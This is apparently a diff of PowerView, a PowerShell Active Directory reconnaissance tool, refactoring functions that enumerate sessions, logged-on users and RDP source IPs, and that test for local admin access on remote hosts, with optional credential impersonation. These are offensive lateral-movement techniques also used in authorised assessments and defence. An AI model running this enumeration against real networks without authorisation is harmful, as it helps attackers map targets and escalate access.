- # free up the result buffer
- $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ }
+ else {
+ Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ }
+ }
}
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
}
}
-filter Get-NetSession {
+function Get-NetSession {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns session information for the local (or a remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+.DESCRIPTION
+
+This function will execute the NetSessionEnum Win32API call to query
+a given host for active sessions.
+
+.PARAMETER ComputerName
- This function will execute the NetSessionEnum Win32API call to query
- a given host for active sessions on the host.
- Heavily adapted from dunedinite's post on stackoverflow (see LINK below)
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to 'localhost'.
- .PARAMETER ComputerName
+.PARAMETER Credential
- The ComputerName to query for active sessions.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- .PARAMETER UserName
+.EXAMPLE
- The user name to filter for active sessions.
+Get-NetSession
- .OUTPUTS
+Returns active sessions on the local host.
- SESSION_INFO_10 structure. A representation of the SESSION_INFO_10
- result structure which includes the host and username associated
- with active sessions, with the ComputerName added.
+.EXAMPLE
- .EXAMPLE
+Get-NetSession -ComputerName sqlserver
- PS C:\> Get-NetSession
+Returns active sessions on the 'sqlserver' host.
- Returns active sessions on the local host.
+.EXAMPLE
- .EXAMPLE
+Get-DomainController | Get-NetSession
- PS C:\> Get-NetSession -ComputerName sqlserver
+Returns active sessions on all domain controllers.
- Returns active sessions on the 'sqlserver' host.
+.EXAMPLE
- .EXAMPLE
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetSession -ComputerName sqlserver -Credential $Cred
- PS C:\> Get-NetDomainController | Get-NetSession
+.OUTPUTS
- Returns active sessions on all domain controllers.
+PowerView.SessionInfo
- .LINK
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
- http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+.LINK
+
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
+ [OutputType('PowerView.SessionInfo')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
+ [String[]]
$ComputerName = 'localhost',
- [String]
- $UserName = ''
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
-
- # arguments for NetSessionEnum
- $QueryLevel = 10
- $PtrInfo = [IntPtr]::Zero
- $EntriesRead = 0
- $TotalRead = 0
- $ResumeHandle = 0
-
- # get session information
- $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
-
- # Locate the offset of the initial intPtr
- $Offset = $PtrInfo.ToInt64()
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
- # 0 = success
- if (($Result -eq 0) -and ($Offset -gt 0)) {
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # arguments for NetSessionEnum
+ $QueryLevel = 10
+ $PtrInfo = [IntPtr]::Zero
+ $EntriesRead = 0
+ $TotalRead = 0
+ $ResumeHandle = 0
+
+ # get session information
+ $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)
+
+ # locate the offset of the initial intPtr
+ $Offset = $PtrInfo.ToInt64()
+
+ # 0 = success
+ if (($Result -eq 0) -and ($Offset -gt 0)) {
+
+ # work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $SESSION_INFO_10::GetSize()
+
+ # parse all the result structures
+ for ($i = 0; ($i -lt $EntriesRead); $i++) {
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $SESSION_INFO_10
+
+ # return all the sections of the structure - have to do it this way for V2
+ $Session = $Info | Select-Object *
+ $Session | Add-Member Noteproperty 'ComputerName' $Computer
+ $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo')
+ $Offset = $NewIntPtr.ToInt64()
+ $Offset += $Increment
+ $Session
+ }
- # Work out how much to increment the pointer by finding out the size of the structure
- $Increment = $SESSION_INFO_10::GetSize()
+ # free up the result buffer
+ $Null = $Netapi32::NetApiBufferFree($PtrInfo)
+ }
+ else {
+ Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)"
+ }
+ }
+ }
- # parse all the result structures
- for ($i = 0; ($i -lt $EntriesRead); $i++) {
- # create a new int ptr at the given offset and cast the pointer as our result structure
- $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
- $Info = $NewIntPtr -as $SESSION_INFO_10
- # return all the sections of the structure
- $Sessions = $Info | Select-Object *
- $Sessions | Add-Member Noteproperty 'ComputerName' $Computer
- $Offset = $NewIntPtr.ToInt64()
- $Offset += $Increment
- $Sessions
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
}
- # free up the result buffer
- $Null = $Netapi32::NetApiBufferFree($PtrInfo)
- }
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"
}
}
-filter Get-LoggedOnLocal {
+function Get-RegLoggedOn {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns who is logged onto the local (or a remote) machine
+through enumeration of remote registry keys.
+
+Note: This function requires only domain user rights on the
+machine you're enumerating, but remote registry must be enabled.
+
+Author: Matt Kelly (@BreakersAll)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
- This function will query the HKU registry values to retrieve the local
- logged on users SID and then attempt and reverse it.
- Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
- using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
- required (NetWkstaUserEnum requires remote admin access).
+.DESCRIPTION
- Note: This function requires only domain user rights on the
- machine you're enumerating, but remote registry must be enabled.
+This function will query the HKU registry values to retrieve the local
+logged on users SID and then attempt and reverse it.
+Adapted technique from Sysinternal's PSLoggedOn script. Benefit over
+using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
+required (NetWkstaUserEnum requires remote admin access).
- Function: Get-LoggedOnLocal
- Author: Matt Kelly, @BreakersAll
+.PARAMETER ComputerName
- .PARAMETER ComputerName
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
- The ComputerName to query for active sessions.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- PS C:\> Get-LoggedOnLocal
+.EXAMPLE
- Returns active sessions on the local host.
+Get-RegLoggedOn
- .EXAMPLE
+Returns users actively logged onto the local host.
- PS C:\> Get-LoggedOnLocal -ComputerName sqlserver
+.EXAMPLE
- Returns active sessions on the 'sqlserver' host.
+Get-RegLoggedOn -ComputerName sqlserver
+Returns users actively logged onto the 'sqlserver' host.
+
+.EXAMPLE
+
+Get-DomainController | Get-RegLoggedOn
+
+Returns users actively logged on all domain controllers.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
+
+.OUTPUTS
+
+PowerView.RegLoggedOnUser
+
+A PSCustomObject including the UserDomain/UserName/UserSID of each
+actively logged on user, with the ComputerName added.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.RegLoggedOnUser')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
+ [String[]]
$ComputerName = 'localhost'
)
- # process multiple host object types from the pipeline
- $ComputerName = Get-NameField -Object $ComputerName
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
- try {
- # retrieve HKU remote registry values
- $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ try {
+ # retrieve HKU remote registry values
+ $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")
- # sort out bogus sid's like _class
- $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {
- $UserName = Convert-SidToName $_
+ # sort out bogus sid's like _class
+ $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {
+ $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple'
- $Parts = $UserName.Split('\')
- $UserDomain = $Null
- $UserName = $Parts[-1]
- if ($Parts.Length -eq 2) {
- $UserDomain = $Parts[0]
- }
+ if ($UserName) {
+ $UserName, $UserDomain = $UserName.Split('@')
+ }
+ else {
+ $UserName = $_
+ $UserDomain = $Null
+ }
- $LocalLoggedOnUser = New-Object PSObject
- $LocalLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"
- $LocalLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain
- $LocalLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName
- $LocalLoggedOnUser | Add-Member Noteproperty 'UserSID' $_
- $LocalLoggedOnUser
+ $RegLoggedOnUser = New-Object PSObject
+ $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"
+ $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain
+ $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName
+ $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_
+ $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser')
+ $RegLoggedOnUser
+ }
+ }
+ catch {
+ Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_"
+ }
}
}
- catch {
- Write-Verbose "Error opening remote registry on '$ComputerName'"
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
}
}
-filter Get-NetRDPSession {
+function Get-NetRDPSession {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns remote desktop/session information for the local (or a remote) machine.
+
+Note: only members of the Administrators or Account Operators local group
+can successfully execute this functionality on a remote target.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+.DESCRIPTION
+
+This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation
+Win32API calls to query a given RDP remote service for active sessions and originating
+IPs. This is a replacement for qwinsta.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for active sessions (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
- This function will execute the WTSEnumerateSessionsEx and
- WTSQuerySessionInformation Win32API calls to query a given
- RDP remote service for active sessions and originating IPs.
- This is a replacement for qwinsta.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- Note: only members of the Administrators or Account Operators local group
- can successfully execute this functionality on a remote target.
+.EXAMPLE
- .PARAMETER ComputerName
+Get-NetRDPSession
- The hostname to query for active RDP sessions.
+Returns active RDP/terminal sessions on the local host.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetRDPSession
+Get-NetRDPSession -ComputerName "sqlserver"
- Returns active RDP/terminal sessions on the local host.
+Returns active RDP/terminal sessions on the 'sqlserver' host.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetRDPSession -ComputerName "sqlserver"
+Get-DomainController | Get-NetRDPSession
- Returns active RDP/terminal sessions on the 'sqlserver' host.
+Returns active RDP/terminal sessions on all domain controllers.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetDomainController | Get-NetRDPSession
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetRDPSession -ComputerName sqlserver -Credential $Cred
- Returns active RDP/terminal sessions on all domain controllers.
+.OUTPUTS
+
+PowerView.RDPSessionInfo
+
+A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure,
+with the ComputerName added.
+
+.LINK
+
+https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
#>
+ [OutputType('PowerView.RDPSessionInfo')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
- $ComputerName = 'localhost'
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
- # open up a handle to the Remote Desktop Session host
- $Handle = $Wtsapi32::WTSOpenServerEx($Computer)
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
- # if we get a non-zero handle back, everything was successful
- if ($Handle -ne 0) {
+ # open up a handle to the Remote Desktop Session host
+ $Handle = $Wtsapi32::WTSOpenServerEx($Computer)
- # arguments for WTSEnumerateSessionsEx
- $ppSessionInfo = [IntPtr]::Zero
- $pCount = 0
-
- # get information on all current sessions
- $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ # if we get a non-zero handle back, everything was successful
+ if ($Handle -ne 0) {
- # Locate the offset of the initial intPtr
- $Offset = $ppSessionInfo.ToInt64()
+ # arguments for WTSEnumerateSessionsEx
+ $ppSessionInfo = [IntPtr]::Zero
+ $pCount = 0
- if (($Result -ne 0) -and ($Offset -gt 0)) {
+ # get information on all current sessions
+ $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
- # Work out how much to increment the pointer by finding out the size of the structure
- $Increment = $WTS_SESSION_INFO_1::GetSize()
+ # locate the offset of the initial intPtr
+ $Offset = $ppSessionInfo.ToInt64()
- # parse all the result structures
- for ($i = 0; ($i -lt $pCount); $i++) {
-
- # create a new int ptr at the given offset and cast the pointer as our result structure
- $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
- $Info = $NewIntPtr -as $WTS_SESSION_INFO_1
+ if (($Result -ne 0) -and ($Offset -gt 0)) {
- $RDPSession = New-Object PSObject
+ # work out how much to increment the pointer by finding out the size of the structure
+ $Increment = $WTS_SESSION_INFO_1::GetSize()
- if ($Info.pHostName) {
- $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName
- }
- else {
- # if no hostname returned, use the specified hostname
- $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer
- }
+ # parse all the result structures
+ for ($i = 0; ($i -lt $pCount); $i++) {
- $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName
+ # create a new int ptr at the given offset and cast the pointer as our result structure
+ $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset
+ $Info = $NewIntPtr -as $WTS_SESSION_INFO_1
- if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {
- # if a domain isn't returned just use the username
- $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"
- }
- else {
- $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"
- }
+ $RDPSession = New-Object PSObject
- $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID
- $RDPSession | Add-Member Noteproperty 'State' $Info.State
+ if ($Info.pHostName) {
+ $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName
+ }
+ else {
+ # if no hostname returned, use the specified hostname
+ $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer
+ }
- $ppBuffer = [IntPtr]::Zero
- $pBytesReturned = 0
+ $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName
- # query for the source client IP with WTSQuerySessionInformation
- # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
- $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {
+ # if a domain isn't returned just use the username
+ $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"
+ }
+ else {
+ $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"
+ }
- if($Result -eq 0) {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"
- }
- else {
- $Offset2 = $ppBuffer.ToInt64()
- $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2
- $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS
+ $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID
+ $RDPSession | Add-Member Noteproperty 'State' $Info.State
- $SourceIP = $Info2.Address
- if($SourceIP[2] -ne 0) {
- $SourceIP = [String]$SourceIP[2]+"."+[String]$SourceIP[3]+"."+[String]$SourceIP[4]+"."+[String]$SourceIP[5]
- }
- else {
- $SourceIP = $Null
- }
+ $ppBuffer = [IntPtr]::Zero
+ $pBytesReturned = 0
+
+ # query for the source client IP with WTSQuerySessionInformation
+ # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx
+ $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
- $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP
- $RDPSession
+ if ($Result2 -eq 0) {
+ Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"
+ }
+ else {
+ $Offset2 = $ppBuffer.ToInt64()
+ $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2
+ $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS
- # free up the memory buffer
- $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)
+ $SourceIP = $Info2.Address
+ if ($SourceIP[2] -ne 0) {
+ $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5]
+ }
+ else {
+ $SourceIP = $Null
+ }
- $Offset += $Increment
+ $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP
+ $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo')
+ $RDPSession
+
+ # free up the memory buffer
+ $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)
+
+ $Offset += $Increment
+ }
+ }
+ # free up the memory result buffer
+ $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)
+ }
+ else {
+ Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
+ # close off the service handle
+ $Null = $Wtsapi32::WTSCloseServer($Handle)
+ }
+ else {
+ Write-Verbose "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"
}
- # free up the memory result buffer
- $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)
- }
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
}
- # Close off the service handle
- $Null = $Wtsapi32::WTSCloseServer($Handle)
}
- else {
- Write-Verbose "Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
}
}
-filter Invoke-CheckLocalAdminAccess {
+function Test-AdminAccess {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Tests if the current user has administrative access to the local (or a remote) machine.
+
+Idea stolen from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
+ 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
+ 'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+.DESCRIPTION
+
+This function will use the OpenSCManagerW Win32API call to establish
+a handle to the remote host. If this succeeds, the current user context
+has local administrator acess to the target.
- This function will use the OpenSCManagerW Win32API call to establish
- a handle to the remote host. If this succeeds, the current user context
- has local administrator acess to the target.
+.PARAMETER ComputerName
- Idea stolen from the local_admin_search_enum post module in Metasploit written by:
- 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
- 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
- 'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
+Specifies the hostname to check for local admin access (also accepts IP addresses).
+Defaults to 'localhost'.
- .PARAMETER ComputerName
+.PARAMETER Credential
- The hostname to query for active sessions.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- .OUTPUTS
+.EXAMPLE
- $True if the current user has local admin access to the hostname, $False otherwise
+Test-AdminAccess -ComputerName sqlserver
- .EXAMPLE
+Returns results indicating whether the current user has admin access to the 'sqlserver' host.
- PS C:\> Invoke-CheckLocalAdminAccess -ComputerName sqlserver
+.EXAMPLE
- Returns active sessions on the local host.
+Get-DomainComputer | Test-AdminAccess
- .EXAMPLE
+Returns what machines in the domain the current user has access to.
- PS C:\> Get-NetComputer | Invoke-CheckLocalAdminAccess
+.EXAMPLE
- Sees what machines in the domain the current user has access to.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Test-AdminAccess -ComputerName sqlserver -Credential $Cred
- .LINK
+.OUTPUTS
- https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
- http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
+PowerView.AdminAccess
+
+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
+the current user has local admin rights, along with the ComputerName added.
+
+.LINK
+
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/
#>
+ [OutputType('PowerView.AdminAccess')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
- $ComputerName = 'localhost'
- )
+ [String[]]
+ $ComputerName = 'localhost',
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # 0xF003F - SC_MANAGER_ALL_ACCESS
- # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
- $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ BEGIN {
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
- Write-Verbose "Invoke-CheckLocalAdminAccess handle: $Handle"
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # 0xF003F - SC_MANAGER_ALL_ACCESS
+ # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
+ $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
- $IsAdmin = New-Object PSObject
- $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer
+ $IsAdmin = New-Object PSObject
+ $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer
- # if we get a non-zero handle back, everything was successful
- if ($Handle -ne 0) {
- $Null = $Advapi32::CloseServiceHandle($Handle)
- $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True
- }
- else {
- Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
- $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False
+ # if we get a non-zero handle back, everything was successful
+ if ($Handle -ne 0) {
+ $Null = $Advapi32::CloseServiceHandle($Handle)
+ $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True
+ }
+ else {
+ Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False
+ }
+ $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess')
+ $IsAdmin
+ }
}
- $IsAdmin
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
}
-filter Get-SiteName {
+function Get-NetComputerSiteName {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns the AD site where the local (or a remote) machine resides.
- This function will use the DsGetSiteName Win32API call to look up the
- name of the site where a specified computer resides.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
- .PARAMETER ComputerName
+.DESCRIPTION
- The hostname to look the site up for, default to localhost.
+This function will use the DsGetSiteName Win32API call to look up the
+name of the site where a specified computer resides.
- .EXAMPLE
+.PARAMETER ComputerName
- PS C:\> Get-SiteName -ComputerName WINDOWS1
+Specifies the hostname to check the site for (also accepts IP addresses).
+Defaults to 'localhost'.
- Returns the site for WINDOWS1.testlab.local.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
- PS C:\> Get-NetComputer | Get-SiteName
+.EXAMPLE
- Returns the sites for every machine in AD.
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
+
+Returns the site for WINDOWS1.testlab.local.
+
+.EXAMPLE
+
+Get-DomainComputer | Get-NetComputerSiteName
+
+Returns the sites for every machine in AD.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.ComputerSite
+
+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
#>
+
+ [OutputType('PowerView.ComputerSite')]
[CmdletBinding()]
- param(
- [Parameter(ValueFromPipeline=$True)]
- [Alias('HostName')]
- [Object[]]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
[ValidateNotNullOrEmpty()]
- $ComputerName = $Env:ComputerName
- )
+ [String[]]
+ $ComputerName = 'localhost',
- # extract the computer name from whatever object was passed on the pipeline
- $Computer = $ComputerName | Get-NameField
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # if we get an IP address, try to resolve the IP to a hostname
- if($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') {
- $IPAddress = $Computer
